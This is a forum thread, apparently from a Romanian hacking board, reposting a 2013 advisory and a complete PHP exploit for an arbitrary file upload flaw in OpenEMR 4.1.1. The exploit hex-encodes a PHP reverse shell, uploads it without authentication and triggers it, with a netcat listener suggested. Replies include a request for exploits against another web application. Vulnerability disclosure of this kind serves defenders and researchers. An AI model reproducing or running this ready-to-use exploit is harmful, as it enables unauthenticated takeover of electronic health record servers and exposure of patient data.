Praetorian503 Posted February 13, 2013 Report Posted February 13, 2013 OpenEMR version 4.1.1 suffers from an arbitrary file upload vulnerability in ofc_upload_image.php. Included is an exploit that triggers a reverse shell.?<?php/*OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload VulnerabilityVendor: OpenEMRProduct web page: http://www.open-emr.orgAffected version: 4.1.1Summary: OpenEMR is a Free and Open Source electronic health records and medicalpractice management application that can run on Windows, Linux, Mac OS X, and manyother platforms.Desc: The vulnerability is caused due to the improper verification of uploadedfiles in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' scriptthru the 'name' parameter. This can be exploited to execute arbitrary PHP codeby uploading a malicious PHP script with multiple extensions.================================================================================/library/openflashchart/php-ofc-library/ofc_upload_image.php:-------------------------------------------------------------21: $default_path = '../tmp-upload-images/';23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);26: $destination = $default_path . basename( $_GET[ 'name' ] );28: echo 'Saving your image to: '. $destination;39: $jfh = fopen($destination, 'w') or die("can't open file");40: fwrite($jfh, $HTTP_RAW_POST_DATA);41: fclose($jfh);46: exit();================================================================================Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Fedora Linux Apache2, PHP 5.4 MySQL 5.5Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2013-5126Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php09.02.2013*/error_reporting(0);set_time_limit(0);$go = "\033[0;92m"; $no = "\033[0;37m";echo $no;$host = $argv[1];$sock = fsockopen($host, 80, $errno, $errstr, 30);if(!$sock){ echo "\n> $errstr ($errno)\n"; die();}function r_shell($sc){ for($z = 0; $z < strlen($sc); $z += 2) $exec .= chr(hexdec(substr($sc,$z,2))); return $exec;}print "\n+--------------------------------------------------------+";print "\n+ +";print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +";print "\n+ +";print "\n+ ID: ZSL-2013-5126 +";print "\n+ +";print "\n+ Copyleft (c) 2013, Zero Science Lab +";print "\n+ +";print "\n+--------------------------------------------------------+\n\n";// PoC for Linux// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234if ($argc < 2){ print "\n> Usage: php $argv[0] <target>\n\n"; die();}$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974". "202830293b0d0a". "246970203d2027". "3132372e302e30". "2e31273b0d0a24". "706f7274203d20". "313233343b0d0a". "246368756e6b5f". "73697a65203d20". "313430303b0d0a". "2477726974655f". "61203d206e756c". "6c3b2024657272". "6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20". "3d2027756e616d". "65202d613b2077". "3b2069643b202f". "62696e2f736820". "2d69273b0d0a24". "6461656d6f6e20". "3d20303b202464". "65627567203d20". "303b0d0a696620". "2866756e637469". "6f6e5f65786973". "7473282770636e". "746c5f666f726b". "272929207b0d0a". "24706964203d20". "70636e746c5f66". "6f726b28293b0d". "0a696620282470". "6964203d3d202d". "3129207b0d0a70". "72696e74697428". "224552524f523a". "2043616e277420". "666f726b22293b". "20657869742831". "293b7d0d0a6966". "20282470696429". "207b6578697428". "30293b7d0d0a69". "662028706f7369". "785f7365747369". "642829203d3d20". "2d3129207b0d0a". "7072696e746974". "28224572726f72". "3a2043616e2774". "20736574736964". "282922293b2065". "7869742831293b". "7d0d0a24646165". "6d6f6e203d2031". "3b7d20656c7365". "207b0d0a707269". "6e746974282257". "41524e494e473a". "204661696c6564". "20746f20646165". "6d6f6e6973652e". "20205468697320". "69732071756974". "6520636f6d6d6f". "6e20616e64206e". "6f742066617461". "6c2e22293b7d0d". "0a636864697228". "222f22293b2075". "6d61736b283029". "3b0d0a24736f63". "6b203d2066736f". "636b6f70656e28". "2469702c202470". "6f72742c202465". "72726e6f2c2024". "6572727374722c". "203330293b0d0a". "69662028212473". "6f636b29207b0d". "0a7072696e7469". "74282224657272". "73747220282465". "72726e6f292229". "3b206578697428". "31293b7d0d0a24". "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270". "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d". "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d". "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470". "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d". "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d". "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573". "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31". "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c". "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a". "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073". "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620". "2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c". "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620". "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053". "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472". "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573". "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73". "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c". "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a". "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e". "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028". "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269". "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928". "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072". "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428". "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920". "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f". "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c". "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444". "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c". "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253". "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574". "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d". "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b". "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20". "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070". "72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY.echo "\n> Writing reverse shell file";$pckt = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n";$pckt .= "Host: {$host}\r\n";$pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}";fputs($sock, $pckt);sleep (2);print " ...."; echo $go."[OK]"; echo $no;echo "\n> Calling your listener";$pckt = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n";$pckt .= "Host: {$host}\r\n";$pckt .= "Connection: Keep-Alive\r\n\r\n";fputs($sock, $pckt);sleep (2);print " ........."; echo $go."[OK]"; echo $no."\n";// interact_sh();echo "\n> Enjoy!\n\n";?>Source: PacketStorm Quote
DeCrew Posted February 13, 2013 Report Posted February 13, 2013 crezi ca ai putea sa postezi in romana ? ca totusi e forum pentru romani. Quote
Praetorian503 Posted February 13, 2013 Author Report Posted February 13, 2013 crezi ca ai putea sa postezi in romana ? ca totusi e forum pentru romani. Da' ce sunt eu? Traducator? Ce ar fi sa traduc fiecare post pe care il fac?Du-te pe la scoala, invata putina engleza, in caz ca nu iti iese, google iti este prieten.Figuranti Quote
Praetorian503 Posted February 13, 2013 Author Report Posted February 13, 2013 Asta a fost prea penala Pretoriane prin packetstorm crezi ca imi poti gasi ceva pentru phpmelody?!Ai destui 'priceputi', acum ca oferiti si servicii Quote